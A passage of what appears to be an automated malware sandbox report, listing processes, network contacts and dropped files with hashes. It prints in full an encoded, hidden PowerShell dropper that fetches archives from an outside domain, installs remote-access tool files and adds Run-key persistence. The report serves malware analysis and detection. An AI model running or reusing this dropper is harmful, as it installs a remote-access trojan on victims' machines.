HRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlBVlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"

C:\Windows\SysWOW64\cmd.exe

cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/337944881edc1d04f3adae65201e2427/" && (for %F in (*.exe) do start "" "%F")"

C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe

"vlc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\85f33d6a260e76acb14f8d50b3a6138d.pdf

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\85f33d6a260e76acb14f8d50b3a6138d.pdf"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcAPQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwBQAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 45.61.158.86:80 45.61.158.86 tcp
US 8.8.8.8:53 availabkelk.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp

Files

\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

MD5 5ecd826babbebdd959456c471dec6465
SHA1 f94a596b742c0653ff7201469f133108f17b46e9
SHA256 b2be43c010bc0d268a42a11296829e088d7eef81cc39bfcdc0b9f0e9a65717ea
SHA512 30563a15786f245e4a7ff1b8996f302dbf4b1d4950098d6899815b5065d3058b290a81b6564c19c85cfcd425c08c9f6bac5bc31ba95773978f9a9c5cde123d38

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

MD5 48c96771106dbdd5d42bba3772e4b414
SHA1 e84749b99eb491e40a62ed2e92e4d7a790d09273
SHA256 a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22
SHA512 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\java.dll

MD5 73bd0b62b158c5a8d0ce92064600620d
SHA1 63c74250c17f75fe6356b649c484ad5936c3e871
SHA256 e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30
SHA512 eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

memory/2200-229-0x0000000000400000-0x000000000042F000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr100.dll

MD5 bf38660a9125935658cfa3e53fdc7d65
SHA1 0b51fb415ec89848f339f8989d323bea722bfd70
SHA256 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
SHA512 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\i386\jvm.cfg

MD5 9fd47c1a487b79a12e90e7506469477b
SHA1 7814df0ff2ea1827c75dcd73844ca7f025998cc6
SHA256 a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e
SHA512 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\client\jvm.dll

MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\verify.dll

MD5 de2167a880207bbf7464bcd1f8bc8657
SHA1 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7
SHA256 fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3
SHA512 bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\meta-index

MD5 91aa6ea7320140f30379f758d626e59d
SHA1 3be2febe28723b1033ccdaa110eaf59bbd6d1f96
SHA256 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4
SHA512 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\zip.dll

MD5 cb99b83bbc19cd0e1c2ec6031d0a80bc
SHA1 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd
SHA256 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec
SHA512 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba

memory/1676-249-0x00000000027F0000-0x0000000002818000-memory.dmp

memory/1676-253-0x0000000002838000-0x0000000002840000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\meta-index

MD5 77abe2551c7a5931b70f78962ac5a3c7
SHA1 a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc
SHA256 c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4
SHA512 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935

memory/1676-257-0x0000000002840000-0x0000000002848000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\asm-all.jar

MD5 f5ad16c7f0338b541978b0430d51dc83
SHA1 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a
SHA256 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d
SHA512 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a

memory/1676-276-0x0000000002828000-0x0000000002830000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-runtime.jar

MD5 d5ef47c915bef65a63d364f5cf7cd467
SHA1 f711f3846e144dddbfb31597c0c165ba8adf8d6b
SHA256 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6
SHA512 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-json-ext.jar

MD5 fde38932b12fc063451af6613d4470cc
SHA1 bc08c114681a3afc05fb8c0470776c3eae2eefeb
SHA256 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830
SHA512 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839

memory/1676-287-0x0000000002898000-0x00000000028A0000-memory.dmp

memory/1676-294-0x00000000028A8000-0x00000000028B0000-memory.dmp

memory/1676-292-0x00000000028A0000-0x00000000028A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\jfxrt.jar
